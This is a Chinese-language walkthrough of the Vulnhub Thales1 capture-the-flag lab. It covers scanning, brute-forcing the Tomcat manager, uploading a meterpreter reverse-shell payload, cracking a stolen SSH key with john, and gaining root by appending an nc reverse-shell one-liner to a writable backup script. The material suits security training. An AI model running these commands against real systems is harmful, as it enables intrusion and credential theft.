第303个Vulnhub靶场演练攻略:Thales1-海口c网

Thales1 Vulnhub 演练

“Thales”是 Vulnhub 上的夺旗挑战赛。MachineBoy 开发了这款机器，功不可没。https://www.vulnhub.com/entry/thales-1,749/在本教程中，我们将学习如何利用 Tomcat 应用程序管理器实例中的漏洞获取系统访问权限，以及如何利用以 root 权限运行的脚本获取 root 访问权限。接下来，让我们看看如何按照正确的步骤攻克这台机器。

在这里插入图片描述

1.网络扫描

1.1 首先，我们将使用 netdiscover 命令扫描网络以查找受害者机器的 IP。

网络发现
我们发现受害者机器的 IP 地址为192.168.2.117

 Currently scanning: Finished!   |   Screen View: Unique Hosts              61 Captured ARP Req/Rep packets, from 5 hosts.   Total size: 3660          _____________________________________________________________________________IP            At MAC Address     Count     Len  MAC Vendor / Hostname      -----------------------------------------------------------------------------192.168.2.1     5e:ec:47:29:ea:18     10     600  Unknown vendor           192.168.2.117   08:00:27:e5:33:20      8     480  PCS Systemtechnik GmbH   192.168.2.127   f0:2f:74:1a:39:e7     22    1320  ASUSTek COMPUTER INC.    192.168.2.129   54:05:db:05:79:fd     15     900  LCFC(Hefei) Electronics T192.168.2.243   d0:11:e5:77:95:09      6     360  Apple, Inc.              ┌──(root㉿kali)-[~]
└─# netdiscover -r 192.168.2.0/24

1.2 此外，我们对开放端口枚举进行了积极扫描（-A），发现了以下端口详细信息：

nmap -A 192.168.1.175
根据 Nmap 输出，我们得到

在端口 22 上运行 SSH 服务器（OpenSSH）
在端口 8080 上运行 HTTP 服务（Apache tomcat）


┌──(root㉿kali)-[~]
└─# nmap -A 192.168.2.117                  
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-31 08:06 EDT
Nmap scan report for miletus.lan (192.168.2.117)
Host is up (0.00052s latency).
Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8c:19:ab:91:72:a5:71:d8:6d:75:1d:8f:65:df:e1:32 (RSA)
|   256 90:6e:a0:ee:d5:29:6c:b9:7b:05:db:c6:82:5c:19:bf (ECDSA)
|_  256 54:4d:7b:e8:f9:7f:21:34:3e:ed:0f:d9:fe:93:bf:00 (ED25519)
8080/tcp open  http    Apache Tomcat 9.0.52
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.52
|_http-open-proxy: Proxy might be redirecting requests
MAC Address: 08:00:27:E5:33:20 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE
HOP RTT     ADDRESS
1   0.52 ms miletus.lan (192.168.2.117)OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.52 seconds┌──(root㉿kali)-[~]
└─#

2.枚举

2.1 滥用HTTP

现在让我们看看是否可以从端口 8080 获取任何有趣的信息。由于 Apache Tomcat 服务器在端口 8080 上运行，我们可以立即在浏览器中看到结果。

我们注意到 Tomcat 版本号：9.0.52

网址：http://192.168.2.117: 8080
在这里插入图片描述

3.渗透

3.1 Metasploit

现在，让我们启动 msfconsole。我们将使用辅助扫描程序来暴力破解 Tomcat 管理器的登录信息。这里我们使用 Metasploit 的默认字典进行密码暴力破解。

结果我们得到的tomcat的密码是tomcat:role1

┌──(root㉿kali)-[~]
└─# msfconsole -q
msf6 > use auxiliary/scanner/http/tomcat_mgr_login
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set rhosts 192.168.2.117
rhosts => 192.168.2.117
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set username tomcat
username => tomcat
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set verbose false
verbose => false
msf6 auxiliary(scanner/http/tomcat_mgr_login) > exploit
[+] 192.168.2.117:8080 - Login Successful: tomcat:role1
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/tomcat_mgr_login) >

3.2 由于我们枚举了 Tomcat Manager 登录凭据，因此我们可以通过注入恶意 Java Payload 来尝试反向连接。我们将利用此漏洞获取 meterpreter shell。

msf6 auxiliary(scanner/http/tomcat_mgr_login) > use exploit/multi/http/tomcat_mgr_upload
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/http/tomcat_mgr_upload) > set rhosts 192.168.2.117
rhosts => 192.168.2.117
msf6 exploit(multi/http/tomcat_mgr_upload) > set rport 8080
rport => 8080
msf6 exploit(multi/http/tomcat_mgr_upload) > set httpusername tomcat
httpusername => tomcat
msf6 exploit(multi/http/tomcat_mgr_upload) > set httppassword role1
httppassword => role1
msf6 exploit(multi/http/tomcat_mgr_upload) > exploit
[*] Started reverse TCP handler on 192.168.2.185:4444 
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying XBTLaZYyu...
[*] Executing XBTLaZYyu...
[*] Undeploying XBTLaZYyu ...
[*] Sending stage (58073 bytes) to 192.168.2.117
[*] Undeployed at /manager/html/undeploy
[*] Meterpreter session 1 opened (192.168.2.185:4444 -> 192.168.2.117:42922) at 2025-05-31 09:35:29 -0400meterpreter > cd /home
meterpreter > ls
Listing: /home
==============Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
040554/r-xr-xr--  4096  dir   2021-10-14 07:28:04 -0400  thalesmeterpreter > cd thales/
meterpreter > ls
Listing: /home/thales
=====================Mode           Size  Type  Last modified            Name
----           ----  ----  -------------            ----
100001/------  457   fil   2021-10-14 07:30:45 -04  .bash_history
--x                        00
100445/r--r--  220   fil   2018-04-04 14:30:26 -04  .bash_logout
r-x                        00
100445/r--r--  3771  fil   2018-04-04 14:30:26 -04  .bashrc
r-x                        00
040001/------  4096  dir   2021-08-15 12:58:00 -04  .cache
--x                        00
040001/------  4096  dir   2021-08-15 12:58:00 -04  .gnupg
--x                        00
040555/r-xr-x  4096  dir   2021-08-15 13:50:29 -04  .local
r-x                        00
100445/r--r--  807   fil   2018-04-04 14:30:26 -04  .profile
r-x                        00
100445/r--r--  66    fil   2021-08-15 13:50:18 -04  .selected_editor
r-x                        00
040777/rwxrwx  4096  dir   2021-08-16 16:34:04 -04  .ssh
rwx                        00
100445/r--r--  0     fil   2021-10-14 06:45:25 -04  .sudo_as_admin_successf
r-x                        00                       ul
100444/r--r--  107   fil   2021-10-14 05:36:43 -04  notes.txt
r--                        00
100000/------  33    fil   2021-08-15 14:18:54 -04  user.txt
---                        00meterpreter >

3.3 获取 meterpreter shell 后，我们导航到“home”目录，在那里我们可以找到一个名为“thales”的子目录。进入“thales”目录，我们得到两个文件：user.txt和notes.txt。我们还找到了一个.ssh目录。

3.4 我们观察到受害者机器上存在公钥（id_rsa.pub）和私钥（id_rsa）。私钥用于登录。现在，我们将私钥下载到我们的kali机器上。

meterpreter > cd .ssh
meterpreter > ls
Listing: /home/thales/.ssh
==========================Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100444/r--r--r--  1766  fil   2021-08-16 16:34:04 -0400  id_rsa
100444/r--r--r--  396   fil   2021-08-16 16:34:04 -0400  id_rsa.pubmeterpreter > download id_rsa /root/Desktop/
[*] Downloading: id_rsa -> /root/Desktop/id_rsa
[*] Downloaded 1.72 KiB of 1.72 KiB (100.0%): id_rsa -> /root/Desktop/id_rsa
[*] Completed  : id_rsa -> /root/Desktop/id_rsa
meterpreter >

3.5 这里我们下载了受密码保护的id_rsa文件，现在我们需要将 id_rsa 密钥转换为可以使用’john ’ 破解的哈希值。首先，我们使用命令 ‘ssh2john’ 将密钥转换为哈希值。

3.6 现在我们可以尝试用 John the Ripper 破解哈希值了。我们将使用单词列表“rockyou.txt”。

┌──(root㉿kali)-[~/Desktop]
└─# locate ssh2john
/usr/bin/ssh2john
/usr/share/john/ssh2john.py
/usr/share/john/__pycache__/ssh2john.cpython-313.pyc┌──(root㉿kali)-[~/Desktop]
└─# /usr/share/john/ssh2john.py id_rsa > sshhash┌──(root㉿kali)-[~/Desktop]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt sshhash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
fopen: /usr/share/wordlists/rockyou.txt: No such file or directory┌──(root㉿kali)-[~/Desktop]
└─# wordlists -h> wordlists ~ Contains the rockyou wordlist/usr/share/wordlists
├── amass -> /usr/share/amass/wordlists
├── dirb -> /usr/share/dirb/wordlists
├── dirbuster -> /usr/share/dirbuster/wordlists
├── dnsmap.txt -> /usr/share/dnsmap/wordlist_TLAs.txt
├── fasttrack.txt -> /usr/share/set/src/fasttrack/wordlist.txt
├── fern-wifi -> /usr/share/fern-wifi-cracker/extras/wordlists
├── john.lst -> /usr/share/john/password.lst
├── legion -> /usr/share/legion/wordlists
├── metasploit -> /usr/share/metasploit-framework/data/wordlists
├── nmap.lst -> /usr/share/nmap/nselib/data/passwords.lst
├── rockyou.txt.gz
├── seclists -> /usr/share/seclists
├── sqlmap.txt -> /usr/share/sqlmap/data/txt/wordlist.txt
├── wfuzz -> /usr/share/wfuzz/wordlist
└── wifite.txt -> /usr/share/dict/wordlist-probable.txtDo you want to extract the wordlist rockyou.txt? [Y/n] y
Extracting rockyou.txt.gz...> wordlists ~ Contains the rockyou wordlist/usr/share/wordlists
├── amass -> /usr/share/amass/wordlists
├── dirb -> /usr/share/dirb/wordlists
├── dirbuster -> /usr/share/dirbuster/wordlists
├── dnsmap.txt -> /usr/share/dnsmap/wordlist_TLAs.txt
├── fasttrack.txt -> /usr/share/set/src/fasttrack/wordlist.txt
├── fern-wifi -> /usr/share/fern-wifi-cracker/extras/wordlists
├── john.lst -> /usr/share/john/password.lst
├── legion -> /usr/share/legion/wordlists
├── metasploit -> /usr/share/metasploit-framework/data/wordlists
├── nmap.lst -> /usr/share/nmap/nselib/data/passwords.lst
├── rockyou.txt
├── rockyou.txt.gz
├── seclists -> /usr/share/seclists
├── sqlmap.txt -> /usr/share/sqlmap/data/txt/wordlist.txt
├── wfuzz -> /usr/share/wfuzz/wordlist
└── wifite.txt -> /usr/share/dict/wordlist-probable.txt┌──(root㉿kali)-[~]
└─# cd Desktop ┌──(root㉿kali)-[~/Desktop]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt sshhash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
vodka06          (id_rsa)     
1g 0:00:00:00 DONE (2025-05-31 09:45) 1.162g/s 3325Kp/s 3325Kc/s 3325KC/s vodka1420..vodka0260
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

3.7 获得 shell 后，我们将使用以下命令将非交互式 shell 升级为部分交互式 shell：

python -c ‘导入pty；pty.spawn(“/bin/bash”)’
由于我们已经破解了用户“thales”的密码，让我们切换到thales用户。

3.8 切换到 thales 用户后，我们使用“ id ”命令查看真实有效的“用户和组”ID。我们发现 thales 是非 root 用户。

3.9 我们现在使用“ sudo -l ”来检查哪些命令可以由用户 thales 以 root 身份运行。

我们发现用户 thales 没有权限以 root 身份运行任何命令。因此，现在我们来搜索一些有趣的文件。

3.10 我们在 note.txt 上得到提示，在目录/usr/local/bin/backup.sh中为我们准备了一个备份脚本

meterpreter > shell
Process 1 created.
Channel 1 created.
python -c 'import pty; pty.spawn("/bin/bash")'
/bin/sh: 1: python: not found
python -c 'import pty; pty.spawn("/bin/bash")'^[[D^[[D^[[D^[[D^[[D^[[1;5D^?
/bin/sh: 2: python: not found
/bin/sh: 2: 5D: not found
python3 -c 'import pty; pty.spawn("/bin/bash")'
tomcat@miletus:/home/thales$ su thales
su thales
Password: vodka06thales@miletus:~$ id
id
uid=1000(thales) gid=1000(thales) groups=1000(thales),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
thales@miletus:~$ sudo -l
sudo -l
[sudo] password for thales: vodka06Sorry, user thales may not run sudo on miletus.
thales@miletus:~$ cd /home
cd /home
thales@miletus:/home$ ls
ls
thales
thales@miletus:/home$ cd thales 
cd thales
thales@miletus:~$ ls
ls
notes.txt  user.txt
thales@miletus:~$ cat notes.txt 
cat notes.txt
I prepared a backup script for you. The script is in this directory "/usr/local/bin/backup.sh". Good Luck.
thales@miletus:~$

3.11 现在，我们来检查一下backup.sh文件。我们检查发现，该文件具有读、写、执行权限，并且文件所有者是root。


hales@miletus:~$ cat /usr/local/bin/backup.sh
ls -la /usr/local/bin/backup.shcat /usr/local/bin/backup.sh
#!/bin/bash
####################################
#
# Backup to NFS mount script.
#
##################################### What to backup. 
backup_files="/opt/tomcat/"# Where to backup to.
dest="/var/backups"# Create archive filename.
day=$(date +%A)
hostname=$(hostname -s)
archive_file="$hostname-$day.tgz"# Print start status message.
echo "Backing up $backup_files to $dest/$archive_file"
date
echo# Backup the files using tar.
tar czf $dest/$archive_file $backup_files# Print end status message.
echo
echo "Backup finished"
date# Long listing of files in $dest to check file sizes.
ls -lh $dest
thales@miletus:~$ ls -la /usr/local/bin/backup.sh-rwxrwxrwx 1 root root 612 Oct 14  2021 /usr/local/bin/backup.sh
thales@miletus:~$

4.权限提升

由于backup.sh是可写的，因此我们可以通过注入反向shell负载来编辑该脚本，并期望获得root shell访问权限。

4.1 在我们的攻击机（kali）上，我们将启动一个 Netcat 监听器来接收 shell，端口为 8888

4.2 在终端中执行以下命令，附加用于注入恶意负载的backup.sh脚本。

thales@miletus:~$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.2.185 8888 >/tmp/f" >>backup.sh
< -i 2>&1|nc 192.168.2.185 8888 >/tmp/f" >>backup.sh
thales@miletus:~$

4.3 因为它是一个自动运行的备份脚本，因此它将通过端口 8888 授予 root 权限的反向 shell。

┌──(root㉿kali)-[~/Desktop]
└─# nc -lvp 8888                                                             
listening on [any] 8888 ...
connect to [192.168.2.185] from miletus.lan [192.168.2.117] 43530
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls
root.txt# cat root.txt
3a1c85bebf8833b0ecae900fb8598b17
#